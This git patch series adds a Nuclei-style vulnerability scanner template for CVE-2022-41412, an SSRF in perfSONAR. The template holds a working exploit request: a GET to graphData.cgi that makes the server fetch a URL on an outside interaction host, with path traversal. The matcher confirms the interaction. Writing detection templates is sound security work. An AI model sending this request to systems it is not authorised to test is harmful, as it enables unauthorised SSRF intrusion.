From 73a64c765269a702aa0cffbb40fb74472d1f3904 Mon Sep 17 00:00:00 2001 From: bob Date: Wed, 3 Apr 2024 09:54:42 +0100 Subject: [PATCH 1/4] Added CVE-2022-41412 perfSONAR SSRF --- http/cves/2022/CVE-2022-41412.yaml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 http/cves/2022/CVE-2022-41412.yaml diff --git a/http/cves/2022/CVE-2022-41412.yaml b/http/cves/2022/CVE-2022-41412.yaml new file mode 100644 index 0000000000..a0fd96f262 --- /dev/null +++ b/http/cves/2022/CVE-2022-41412.yaml @@ -0,0 +1,25 @@ +id: CVE-2022-41412 + +info: + name: SSRF via perfSONAR > 4.x <= 4.4.4 + author: null_hypothesis + severity: high + reference: + - https://github.com/renmizo/CVE-2022-41412 + - https://hackerone.com/reports/2445802 + - https://github.com/perfsonar/graphs/commit/463e1d9dc30782d9b1c002143551ec78b74e03bb + - https://www.perfsonar.net/releasenotes-2022-09-20-4-4-5.html + metadata: + max-request: 1 + tags: ssrf, perfsonar, cve2022 + +http: + - method: GET + path: + - "{{BaseURL}}/perfsonar-graphs/cgi-bin/graphData.cgi?action=ma_data&url=http://{{interactsh-url}}/esmond/perfsonar/archive/../../../&src=8.8.8.8&dest=8.8.4.4" + + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" From a1c4357a78e34186a8178a217365561f2411bb48 Mon Sep 17 00:00:00 2001 From: bob Date: Wed, 3 Apr 2024 09:56:25 +0100 Subject: [PATCH 2/4] Removed trailing char --- http/cves/2022/CVE-2022-41412.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2022/CVE-2022-41412.yaml b/http/cves/2022/CVE-2022-41412.yaml index a0fd96f262..f34a63420a 100644 --- a/http/cves/2022/CVE-2022-41412.yaml +++ b/http/cves/2022/CVE-2022-41412.yaml @@ -22,4 +22,4 @@ http: - type: word part: interactsh_protocol # Confirms the HTTP Interaction words: - - "http" + - "http" From 4b38c49b9d50cd47fd45ef9b34e4f846330209a8 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Wed, 3 Apr 2024 16:48:02 +0530 Subject: [PATCH 3/4] misc improvements --- http/cves/2022/CVE-2022-41412.yaml | 63 ++++++++++++++++++------------ 1 file changed, 38 insertions(+), 25 deletions(-) diff --git a/http/cves/2022/CVE-2022-41412.yaml b/http/cves/2022/CVE-2022-41412.yaml index f34a63420a..eca8a2f235 100644 --- a/http/cves/2022/CVE-2022-41412.yaml +++ b/http/cves/2022/CVE-2022-41412.yaml @@ -1,25 +1,38 @@ -id: CVE-2022-41412 - -info: - name: SSRF via perfSONAR > 4.x <= 4.4.4 - author: null_hypothesis - severity: high - reference: - - https://github.com/renmizo/CVE-2022-41412 - - https://hackerone.com/reports/2445802 - - https://github.com/perfsonar/graphs/commit/463e1d9dc30782d9b1c002143551ec78b74e03bb - - https://www.perfsonar.net/releasenotes-2022-09-20-4-4-5.html - metadata: - max-request: 1 - tags: ssrf, perfsonar, cve2022 - -http: - - method: GET - path: - - "{{BaseURL}}/perfsonar-graphs/cgi-bin/graphData.cgi?action=ma_data&url=http://{{interactsh-url}}/esmond/perfsonar/archive/../../../&src=8.8.8.8&dest=8.8.4.4" - - matchers: - - type: word - part: interactsh_protocol # Confirms the HTTP Interaction - words: - - "http" +id: CVE-2022-41412 + +info: + name: perfSONAR 4.x <= 4.4.4 - Server-Side Request Forgery + author: null_hypothesis + severity: high + description: | + An issue in the graphData.cgi component of perfSONAR v4.4.5 and prior allows attackers to access sensitive data and execute Server-Side Request Forgery (SSRF) attacks. + reference: + - https://github.com/renmizo/CVE-2022-41412 + - https://hackerone.com/reports/2445802 + - https://github.com/perfsonar/graphs/commit/463e1d9dc30782d9b1c002143551ec78b74e03bb + - https://www.perfsonar.net/releasenotes-2022-09-20-4-4-5.html + - http://packetstormsecurity.com/files/170069/perfSONAR-4.4.4-Open-Proxy-Relay.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N + cvss-score: 8.6 + cve-id: CVE-2022-41412 + cwe-id: CWE-918 + epss-score: 0.0012 + epss-percentile: 0.45431 + cpe: cpe:2.3:a:perfsonar:perfsonar:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: perfsonar + product: perfsonar + fofa-query: title="perfSONAR Toolkit" + tags: cve,cve2022,ssrf,hackerone,packetstorm,perfsonar + +http: + - method: GET + path: + - "{{BaseURL}}/perfsonar-graphs/cgi-bin/graphData.cgi?action=ma_data&url=http://oast.fun/esmond/perfsonar/archive/../../../&src=8.8.8.8&dest=8.8.4.4" + + matchers: + - type: word + words: + - https://github.com/projectdiscovery/interactsh From c884f85db147d2ab4c79af760dcb5d85479fb75e Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 3 Apr 2024 16:55:36 +0530 Subject: [PATCH 4/4] minor update --- http/cves/2022/CVE-2022-41412.yaml | 9 ++++++++- 1 file changed, 8 insertions(+), 1 deletion(-) diff --git a/http/cves/2022/CVE-2022-41412.yaml b/http/cves/2022/CVE-2022-41412.yaml index eca8a2f235..0151e0c77c 100644 --- a/http/cves/2022/CVE-2022-41412.yaml +++ b/http/cves/2022/CVE-2022-41412.yaml @@ -25,6 +25,7 @@ info: vendor: perfsonar product: perfsonar fofa-query: title="perfSONAR Toolkit" + verified: true tags: cve,cve2022,ssrf,hackerone,packetstorm,perfsonar http: @@ -32,7 +33,13 @@ http: path: - "{{BaseURL}}/perfsonar-graphs/cgi-bin/graphData.cgi?action=ma_data&url=http://oast.fun/esmond/perfsonar/archive/../../../&src=8.8.8.8&dest=8.8.4.4" + matchers-condition: and matchers: - type: word + part: body words: - - https://github.com/projectdiscovery/interactsh + -

Interactsh Server

+ + - type: status + status: + - 200